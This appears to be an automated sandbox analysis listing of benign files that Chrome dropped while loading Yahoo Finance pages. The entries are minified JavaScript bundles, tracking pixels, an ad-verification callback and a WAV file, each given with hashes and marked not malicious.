                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6758153040851855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:h/SaNLBKpqYFCu1YSHKHg4Rcgf+F/FCD:TZBK/hYoKA4mg24D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:42F21DB36AD72C8C36A737B4C5A568D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:391A315C736001175C1CEA254C588B932260D880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:31A34028CF64A9C5415FD0E5E5920A4057FADD0B5974ADDA1D13EB45AAFFBFC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D697AEE856C373450D1762C91AACE13499E57BE53D649A91311AE87DE1494729531CC87A1970A12E70FF0533ACA91ED3BE5CCEB8A24DB5792B42288C8835B831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const o=typeof window<"u"?window:typeof globalThis<"u"?globalThis:global;export{o as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1530)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390764061467899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:q+EnJsR9Nb0J22exGwJOnN3MgecZK9y1loVqshCtRFlrnXnHXqp+clOIg8:q7nJETb0J2X0N3Mu4aloVhMtjlrnX9c5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97C4D137E5DC0D7F8E78C09677DD32F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7C18B642474F2CFFDB99BE89291F3CEA0FF230B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F6ADE77F37214782984C880C04C5750522FE2B4DBA4B48D3D245FDA5DE8D7EB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:744DE743DBA5C4BD0545FB0512686AA6FBB6F4DE5835DBA8CD347E911C95A6643089A4ADE256E4DBA7C89510FDD1EDC3C1017569378708CC18E0BD47E2A41BE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as _,e as h,d as b,f as v,i as p,q as u,k as g,o as k}from"./scheduler.Dr9AAxFe.js";import{S as M,i as C,c as N,b as y,m as S,t as q,a as $,d as w}from"./index.DCSmZEjO.js";import{p as E}from"./stores.DPDRpTFd.js";import{M as O,a as f}from"./marketsUtil.ScItRG1n.js";import{N as T}from"./NavBar.DMjInWD3.js";import{q as x,t as A}from"./commonUtil.CI22_Irn.js";function B(s){let a,e,n;return e=new T({props:{ariaLabel:"Markets Navigation",items:s[0],listClassName:"md:tw-pt-[--space-1]",i13nModel:{elm:"navcat",sec:"mrkt-fin-navbar"},vertical:!0}}),{c(){a=h("section"),N(e.$$.fragment),this.h()},l(t){a=b(t,"SECTION",{class:!0,"data-testid":!0});var r=v(a);y(e.$$.fragment,r),r.forEach(p),this.h()},h(){u(a,"class","container yf-kpoc60"),u(a,"data-testid","markets-nav-bar")},m(t,r){g(t,a,r),S(e,a,null),n=!0},p(t,[r]){const o={};r&1&&(o.items=t[0]),e.$set(o)},i(t){n||(q(e.$$.fragment,t),n=!0)},o(t){$(e.$$.fragment,t),n=!1},d(t){t&&p(a),w(e)}}}function I(s,a,e){let n,t,r,o;k(s,E,c=>e(4,o=c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.416883070797911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:cwP06gWLPbPt77MAlH7EGMNQ77MA6LlHF:corgc14AVtME4A6Ln
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7F85207AE196263DBE9A90A038618A5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D8BF745FF11FDFCDEA34FB57126F3EF34849FF12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5873ECA3D5CBE6E6743B78E7872580C1708299FEC48159418421B1228DFCF379
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F3F27440EB95721652903A07CBE4731D9C74D976588BCD8E16DAD3D03B27B5D8FF1A7AD36D152147C3A6213240602A98F115E3A3CB609AD962FD45003F0DC72E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://rtb0.doubleverify.com/verify.js?ctx=20006197&cmp=31049690&sid=5071708&plc=382132454&crt=192766442&advid=3876774&adsrv=1&mon=1&blk=1&dvp_cawf=crtwrp&cm360cw=1&unit=728x90&prr=1&turl=https%3A%2F%2Ffinance.yahoo.com%2Fmarkets%2Fcrypto%2Fall%2F&aucmp=20678044986&auevent=ABAjH0jBI5NoWyFvIXMOtDRNBpU0&autt=1&ppid=103&aucrtv=536029563&auorder=1014837928&pltfrm=1&ausite=6613965583&auxch=1&aufilter1=1982032&c1=1982032&adid=&app=&dup=&gmnpo=&isdvvid=&supplySource=&tagtype=&aUrlD=0&brid=3&bridua=3&brver=117.0.0.0&brh=1&vavbkt=&lvvn=28&fcifrms=25&winh=90&winw=728&chro=1&noc=4&wouh=984&wouw=1280&htmlmsging=1&refD=1&scah=984&scaw=1280&jsver=6793&uid=1728414886860448&srcurlD=0&ttfrms=88&num=6&dvp_isOnHead=0&flvr=1&ver=6793&jsCallback=__verify_callback_1728414886860448&jsTagObjCallback=__tagObject_callback_1728414886860448&ssl=1&m1=96&blkmode=2&dvp_rcp=2&dvp_seem=2&dvp_tuk=1&dvp_sukv=92144122.05984606&ee_dp_sukv=92144122.05984606&dvp_tukv=106748920.65443093&ee_dp_tukv=106748920.65443093&eparams=DC4FC%3Dl9EEADTbpTauTau7%3A%3F2%3F46%5DJ29%40%40%5D4%40%3ETau%3E2C%3C6EDTau4CJAE%40Tau2%3D%3DTauU2%3F4r92%3A%3Fl9EEADTbpTauTau7%3A%3F2%3F46%5DJ29%40%40%5D4%40%3ETar9EEADTbpTauTauh36f26cgaab46_dd_6hhf2h%60%60hb%60a4c4%5DD2767C2%3E6%5D8%40%408%3D6DJ%3F5%3A42E%3A%40%3F%5D4%40%3E&referrer=https%3A%2F%2F9be7ae48223ce0550e997a9119312c4c.safeframe.googlesyndication.com%2Fsafeframe%2F1-0-40%2Fhtml%2Fcontainer.html&dvp_rdyst=interactive&dvp_excm=2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:..try{__tagObject_callback_1728414886860448({ImpressionID:"e9c7fc32685d4ea3a7784e7b5a0d4ad8", ServerPublicDns:"rtbc-ew1.doubleverify.com"});}catch(e){}.try{$dvbs.pubSub.publish('BeforeDecisionRender', "e9c7fc32685d4ea3a7784e7b5a0d4ad8");}catch(e){}.try{__verify_callback_1728414886860448({.ResultID:2,.Passback:"",.AdWidth:728,.AdHeight:90});}catch(e){}.try{$dvbs.pubSub.publish('AfterDecisionRender', "e9c7fc32685d4ea3a7784e7b5a0d4ad8");}catch(e){}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2733)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2734
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.318999874087255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:wyeg4Nyx04/klhQUXouFGsQt3Go7hTilGoYmhwK1M6HnsSpH48XUQ+5Cz:wRJ4MlhQUX1cX3Go7hGlGoHwoMAsSpHr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7CE9B8FF10E69A4F9AD55C30A3E4309B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E927951AE63B69588FFD72558304120EB101A83B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:24E899DBD001B954F8EE2105EEBF1A00D60EE9FCE37DB7E61099DB047B1F97B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3339DA4812F4011129B0766835C2B71737A1D20F82A07965CF7255B814B658884D2EA9549F359F5E8CE8ECE17FF627899A2D36141282CC0AE4039064DE78C615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,p as d,k as u,i as f,y as w,c as A,b as G,j as B,u as H,g as J,a as M,e as S,d as N,f as D,q as I,n as L,F as O,G as P,v as Q}from"./scheduler.Dr9AAxFe.js";import{S as R,i as T,t as m,g as U,a as k,e as W}from"./index.DCSmZEjO.js";import{g as X,h as Y}from"./commonUtil.CI22_Irn.js";import{i as Z}from"./intersectUtil.DVqOQxux.js";import{a as x}from"./43.CtYdpA_T.js";import{g as $,r as v}from"./headerUtil.D8XWvN0j.js";const ee=r=>({loading:r&1,Component:r&32,value:r&16,hasError:r&8}),z=r=>({loading:r[0],Component:r[5],value:r[4],hasError:r[3]});function C(r){let t,i,e=r[0]&&E(r);const l=r[10].default,s=A(l,r,r[9],z);return{c(){e&&e.c(),t=G(),s&&s.c()},l(o){e&&e.l(o),t=B(o),s&&s.l(o)},m(o,n){e&&e.m(o,n),u(o,t,n),s&&s.m(o,n),i=!0},p(o,n){o[0]?e?e.p(o,n):(e=E(o),e.c(),e.m(t.parentNode,t)):e&&(e.d(1),e=null),s&&s.p&&(!i||n&569)&&H(s,l,o,o[9],i?M(l,o[9],n,ee):J(o[9]),z)},i(o){i||(m(s,o),i=!0)},o(o){k(s,o),i=!1},d(o){o&&f(t),e&&e.d(o),s&&s.d(o)}}}function E(r){let t;function i(s,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ade.googlesyndication.com/ddm/activity/dc_oe=ChMI7fLtwL__iAMVyquDBx3XRAhsEAAYACDej-ZqQhMI7o_hrr__iAMV_LNaBR0rDBdP;dc_eps=AHas8cCFt5pz_UyUB_4Xz6TFH4S2xY7PP4ZQuqESIAfLZN0I3ZhXXkUAMUMrIZ8exux3L7_o6YgVGosa3M9UJPBfS6k;met=1;&timestamp=1728414979485;eid1=2;ecn1=0;etm1=1;eid2=12;ecn2=0;etm2=1;eid4=960585;ecn4=1;etm4=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2300)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.325021030225331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:adOJa/nJA+8CjMIwzVJh+BF8y3lJUE8+bP7dMcKbPoyomZV3SNN:adOJa/Jnp2zvh+BFZPUEpbhMX7o1mm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3989DA7F7944D63A430A5A819E50740D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D4D387D315136BE458764BCD9BE3FFABA1A157E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CAD27531D30FD25BFB54AA6E2A44144BECBE7F2FAD0BD5477B6D57BD708D9FCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7C13010DEB2ED1C0D30EAB9AFD31008E8944B6680DEDD0887627DF600FED38CD7676D7B5FDA7B65FCAE0D0DF808500D9C90E98E3B47F794C1FF7E4FF8702301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as v,p as g,k as h,n as s,i as o,A as w,e as q,t as V,d as C,f as E,h as S,B as k,l as A,M as H}from"./scheduler.Dr9AAxFe.js";import{g as M}from"./spread.CgU5AtxT.js";import{S as N,i as R}from"./index.DCSmZEjO.js";function B(i){const e=i.slice(),t=e[4]||{};return e[10]=t.fmt!==void 0?t.fmt:"-",e[11]=t.raw!==void 0?t.raw:"-",e}function y(i){let e,t=i[10]+"",_,u,n,a,d=[{"data-test":"change"},{"data-symbol":i[3]},{"data-field":u=i[1].id},{"data-trend":"none"},{"data-pricehint":n=i[0].original.priceHint},{"data-value":a=i[11]},i[2]?{active:""}:{}],f={};for(let l=0;l<d.length;l+=1)f=w(f,d[l]);return{c(){e=q("fin-streamer"),_=V(t),this.h()},l(l){e=C(l,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-value":!0});var c=E(e);_=S(c,t),c.forEach(o),this.h()},h(){k(e,f)},m(l,c){h(l,e,c),A(e,_)},p(l,c){c&16&&t!==(t=l[10]+"")&&H(_,t,f.contenteditable),k(e,f=M(d,[{"data-test":"change"},c&8&&{"data-symbol":l[3]},c&2&&u!==(u=l[1].id)&&{"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):80336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.269936136252251
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:SeUkTzc2ZSN8XQ9NbA2PentRJ2wADNXh/xuEU0bI799K:S9wzBZw8XQP5WSNXh/I0Iy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F536E8F265FBBD76A5F7B9FC0EA0AD69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DB474F6CA6E7548D47CC3B078E66ABDD5719066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:63678162CB830AFBA8013A29BE9148C72C3DD90561F1B0E7A3CDFBFD883912D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2D8D79BF7DD4DDD61B871B3E54E61972CFD2CAD17F11865707E006A4F9FFADA7B9B2524A1F7CE056AEFD2B36E43264A813FD9ECE00B3182D034AEE5FB84A75D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/pv/static/misc/voice-result-202105050733.wav:2f82923897f763:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.9..WAVEfmt ........D... b.... .dataH...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.748805071873871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHXDFhCTL6lRcoFU6uSvHBXheF/cazTPH8KFAh:H69mc4sl3O4zDQL6Akd/Bg+fb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:14EA00F1960955017A2D326CE7DD4901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9E6218631E95A6197E972A28CFF3F6CF12996DBE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0D1B099D5A0C41A08AF16526735EA6A3C14FF505892302D1D5588A9FED26CEFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE2CDC29D7B7E03D9245858B251BC1E8F13E0D38B4A664B45F36E1A82DF74D6624E9BDAA749D2C8F40D8E892E0F2EBBECEA9CA915D28C53D34FB87FCC2178D21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13914), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.258346764050396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3x7q46AEQ42tWCnPfQefR7GDD6Ub45XBB8qQMmF88zzAqSeXHr4baLHDW4XbXZ34:B7q46P5gp7GD9b45s3kjeXr4UjW4XbXm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69831B2F7B26BC6DD6321C8DCDE85968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE0D47A076698915D827447B210BFFAB24AF3BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ED22526F9ADCDD172C698E0DFC9FA3EE064A96A27BED3335931C4B2BDDF4EEE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2804AEA752858CBE2020FE5977B1BD4F064026D758ACF19176498F70DB4026604DFFABC9350F61E1022AD405BD46C01080B4F65E579AF6BA1E2C326E356771B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-lightbox"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var l=o[n]={i:n,l:!1,exports:{}};return e[n].call(l.exports,l,l.exports,t),l.l=!0,l.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,n){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function n(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurabl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.153971139811532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3e4uADK8v5xzWosWjYugPwNC96vTrWJcXux8jVD:3qA+8nWofjYFPwo6vTrq0uep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E3968239B770B8186BB480D513311CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E2583E321454F9F48193918E3316533226ED62FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D77E659299C397037513AFF88093B64F6CE29994B94D99256AD84A7910C0CEB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:487F486C165C5E6FAD46A8BBCB6279147FA93D3D3A004327D0DFDEA5040F9B320FE5439A0E2E849DFBB8CBB4FC1ADFDF6647BCCA1DDECCAAD5C36093FCE7A2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-image-1.4.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-image"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(r[a])return r[a].exports;var o=r[a]={i:a,l:!1,exports:{}};return e[a].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,a){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (58453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):480231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.420644885310271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:V9iviwh+gUW1T3gv69owLgI9pNThOyk9BsHgv5LsUh3:3ZwYgUkTwv69o0z9pNTf08gvxh3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C37A1910680F317861AA498CA50792EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5CBA6D1C1A9CE168ADF4B150676CDC6C5EB74402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C4ACE0B2EBDB364DE05AB1E835D08BB84BE0342A2906D2625D5D79AD5655724D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E2095C1BFCB0DEADF7BAB56810905DFE8309CBB66A5568286A8B1A09B3686EA99E70FA794C254C44541CEEDA977B169371C6675703FB7D9628111CDD427FC62E
